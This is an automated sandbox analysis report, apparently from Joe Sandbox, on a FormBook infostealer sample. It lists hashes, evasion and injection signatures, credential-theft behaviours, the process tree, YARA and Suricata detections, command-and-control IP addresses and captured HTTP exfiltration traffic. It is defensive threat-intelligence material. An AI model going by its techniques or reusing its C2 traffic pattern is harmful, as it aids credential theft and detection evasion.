Edit tour

Windows Analysis Report
2Stejb80vJ.exe

Overview

General Information

Sample name:	2Stejb80vJ.exe renamed because original name is a hash value
Original sample name:	d29ed04c296d7d0415de3da4229fcabb9f47cf6ba5800dfb11d57c35061d4d9b.exe
Analysis ID:	1631760
MD5:	b95ef20686db0da52f6796fa134f76a7
SHA1:	ac96b10b8bee3607d0cdf3ee153927ad74152bbf
SHA256:	d29ed04c296d7d0415de3da4229fcabb9f47cf6ba5800dfb11d57c35061d4d9b
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

2Stejb80vJ.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\2Stejb80vJ.exe" MD5: B95EF20686DB0DA52F6796FA134F76A7)

InstallUtil.exe (PID: 7128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

UPM8KZRaz30lCAjNcEm6.exe (PID: 4224 cmdline: "C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\oH7OzLtBL61l.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

msfeedssync.exe (PID: 6892 cmdline: "C:\Windows\SysWOW64\msfeedssync.exe" MD5: E1C1AB8118F67D856FD140FB7175BF13)

UPM8KZRaz30lCAjNcEm6.exe (PID: 5556 cmdline: "C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\M7Wk0TA6V.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 7164 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1511972245.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3727661903.0000000005840000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1267757306.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.3725575572.0000000002860000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1288833714.0000000005D10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1280336868.00000000047C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.3725515204.00000000041B0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1511179304.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3723672280.0000000002470000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1280336868.0000000004563000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.3724115187.0000000002710000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1513679898.0000000003420000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: 2Stejb80vJ.exe PID: 6872	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 2Stejb80vJ.exe PID: 6872	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.InstallUtil.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.2Stejb80vJ.exe.46c16ce.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2Stejb80vJ.exe.5d10000.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2Stejb80vJ.exe.47c0ec0.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2Stejb80vJ.exe.5d10000.12.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2Stejb80vJ.exe.46c16ce.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2Stejb80vJ.exe.4630dd0.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.2Stejb80vJ.exe.47c0ec0.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 5 entries

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:12:31.326599+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49687	148.72.247.70	80	TCP
2025-03-07T15:12:54.685396+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49692	46.30.211.38	80	TCP
2025-03-07T15:13:08.835529+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49696	47.83.1.90	80	TCP
2025-03-07T15:13:45.332674+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49700	149.104.184.89	80	TCP
2025-03-07T15:13:58.653417+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49704	209.74.64.58	80	TCP
2025-03-07T15:14:15.972251+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49708	199.59.243.228	80	TCP
2025-03-07T15:14:29.276813+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49712	13.248.169.48	80	TCP
2025-03-07T15:14:43.737178+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49716	47.83.1.90	80	TCP
2025-03-07T15:14:57.052520+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49720	104.21.112.1	80	TCP
2025-03-07T15:15:10.236719+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49724	13.248.169.48	80	TCP
2025-03-07T15:15:26.184320+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49728	103.106.67.112	80	TCP
2025-03-07T15:15:39.548031+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49732	13.248.169.48	80	TCP
2025-03-07T15:15:52.968511+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49736	144.76.229.203	80	TCP
2025-03-07T15:16:06.600943+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49740	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:12:31.326599+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49687	148.72.247.70	80	TCP
2025-03-07T15:12:54.685396+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49692	46.30.211.38	80	TCP
2025-03-07T15:13:08.835529+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49696	47.83.1.90	80	TCP
2025-03-07T15:13:45.332674+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49700	149.104.184.89	80	TCP
2025-03-07T15:13:58.653417+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49704	209.74.64.58	80	TCP
2025-03-07T15:14:15.972251+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49708	199.59.243.228	80	TCP
2025-03-07T15:14:29.276813+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49712	13.248.169.48	80	TCP
2025-03-07T15:14:43.737178+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49716	47.83.1.90	80	TCP
2025-03-07T15:14:57.052520+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49720	104.21.112.1	80	TCP
2025-03-07T15:15:10.236719+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49724	13.248.169.48	80	TCP
2025-03-07T15:15:26.184320+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49728	103.106.67.112	80	TCP
2025-03-07T15:15:39.548031+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49732	13.248.169.48	80	TCP
2025-03-07T15:15:52.968511+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49736	144.76.229.203	80	TCP
2025-03-07T15:16:06.600943+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49740	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T15:12:47.059093+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49689	46.30.211.38	80	TCP
2025-03-07T15:12:49.619920+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49690	46.30.211.38	80	TCP
2025-03-07T15:12:52.166486+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49691	46.30.211.38	80	TCP
2025-03-07T15:13:01.241814+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49693	47.83.1.90	80	TCP
2025-03-07T15:13:03.736032+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49694	47.83.1.90	80	TCP
2025-03-07T15:13:06.335638+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49695	47.83.1.90	80	TCP
2025-03-07T15:13:17.851562+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49697	149.104.184.89	80	TCP
2025-03-07T15:13:20.397938+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49698	149.104.184.89	80	TCP
2025-03-07T15:13:22.944712+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49699	149.104.184.89	80	TCP
2025-03-07T15:13:50.971414+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49701	209.74.64.58	80	TCP
2025-03-07T15:13:53.535104+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49702	209.74.64.58	80	TCP
2025-03-07T15:13:56.058603+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49703	209.74.64.58	80	TCP
2025-03-07T15:14:08.320125+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49705	199.59.243.228	80	TCP
2025-03-07T15:14:10.948267+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49706	199.59.243.228	80	TCP
2025-03-07T15:14:13.413482+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49707	199.59.243.228	80	TCP
2025-03-07T15:14:21.520466+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49709	13.248.169.48	80	TCP
2025-03-07T15:14:24.025765+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49710	13.248.169.48	80	TCP
2025-03-07T15:14:26.712497+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49711	13.248.169.48	80	TCP
2025-03-07T15:14:35.851143+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49713	47.83.1.90	80	TCP
2025-03-07T15:14:38.397742+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49714	47.83.1.90	80	TCP
2025-03-07T15:14:40.946016+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49715	47.83.1.90	80	TCP
2025-03-07T15:14:49.428774+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49717	104.21.112.1	80	TCP
2025-03-07T15:14:51.960642+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49718	104.21.112.1	80	TCP
2025-03-07T15:14:54.532997+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49719	104.21.112.1	80	TCP
2025-03-07T15:15:02.633798+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49721	13.248.169.48	80	TCP
2025-03-07T15:15:05.227262+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49722	13.248.169.48	80	TCP
2025-03-07T15:15:07.686722+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49723	13.248.169.48	80	TCP
2025-03-07T15:15:18.539634+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49725	103.106.67.112	80	TCP
2025-03-07T15:15:21.066237+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49726	103.106.67.112	80	TCP
2025-03-07T15:15:23.639867+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49727	103.106.67.112	80	TCP
2025-03-07T15:15:31.701583+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49729	13.248.169.48	80	TCP
2025-03-07T15:15:34.338197+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49730	13.248.169.48	80	TCP
2025-03-07T15:15:36.972394+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49731	13.248.169.48	80	TCP
2025-03-07T15:15:45.324867+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49733	144.76.229.203	80	TCP
2025-03-07T15:15:47.921367+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49734	144.76.229.203	80	TCP
2025-03-07T15:15:50.422758+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49735	144.76.229.203	80	TCP
2025-03-07T15:15:58.968441+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49737	13.248.169.48	80	TCP
2025-03-07T15:16:01.517408+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49738	13.248.169.48	80	TCP
2025-03-07T15:16:04.080981+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49739	13.248.169.48	80	TCP
2025-03-07T15:16:12.130704+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49741	13.248.169.48	80	TCP
2025-03-07T15:16:14.678749+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49742	13.248.169.48	80	TCP
2025-03-07T15:16:17.255249+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49743	13.248.169.48	80	TCP

HTTP traffic detected: POST /wydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.schoeler.proOrigin: http://www.schoeler.proCache-Control: max-age=0Connection: closeContent-Length: 210Content-Type: application/x-www-form-urlencodedReferer: http://www.schoeler.pro/wydt/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.16Data Raw: 75 74 31 74 49 3d 30 58 39 5a 77 75 6f 46 32 72 2f 43 7a 68 32 34 34 35 43 58 6b 34 7a 6d 51 63 6f 5a 58 64 70 6d 44 5a 76 74 4d 68 6c 59 5a 6b 4d 43 33 4b 76 50 61 51 54 73 6f 54 62 41 58 7a 5a 4b 6b 48 32 6e 76 34 56 4c 77 2b 4c 69 64 6f 71 53 65 4e 43 43 67 6b 65 78 32 46 70 39 62 68 6a 56 50 41 55 68 55 79 69 52 33 6a 57 59 61 50 74 49 4a 42 66 59 34 67 79 73 45 51 4d 6a 58 4f 66 64 4e 7a 59 5a 4c 6f 53 54 2b 71 43 43 5a 36 71 33 4b 37 62 7a 42 78 78 53 67 31 57 64 49 45 41 76 4b 67 57 32 50 4c 4b 36 41 69 51 38 48 59 6c 56 32 4a 30 6b 6c 7a 51 49 47 79 47 2b 67 67 5a 39 57 58 49 77 6e 55 68 75 30 45 52 6d 6c 39 52 33 Data Ascii: ut1tI=0X9ZwuoF2r/Czh2445CXk4zmQcoZXdpmDZvtMhlYZkMC3KvPaQTsoTbAXzZKkH2nv4VLw+LidoqSeNCCgkex2Fp9bhjVPAUhUyiR3jWYaPtIJBfY4gysEQMjXOfdNzYZLoST+qCCZ6q3K7bzBxxSg1WdIEAvKgW2PLK6AiQ8HYlV2J0klzQIGyG+ggZ9WXIwnUhu0ERml9R3

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Mar 2025 14:12:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Mar 2025 14:12:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Mar 2025 14:12:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Mar 2025 14:12:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:13:03 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:13:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:13:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:13:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 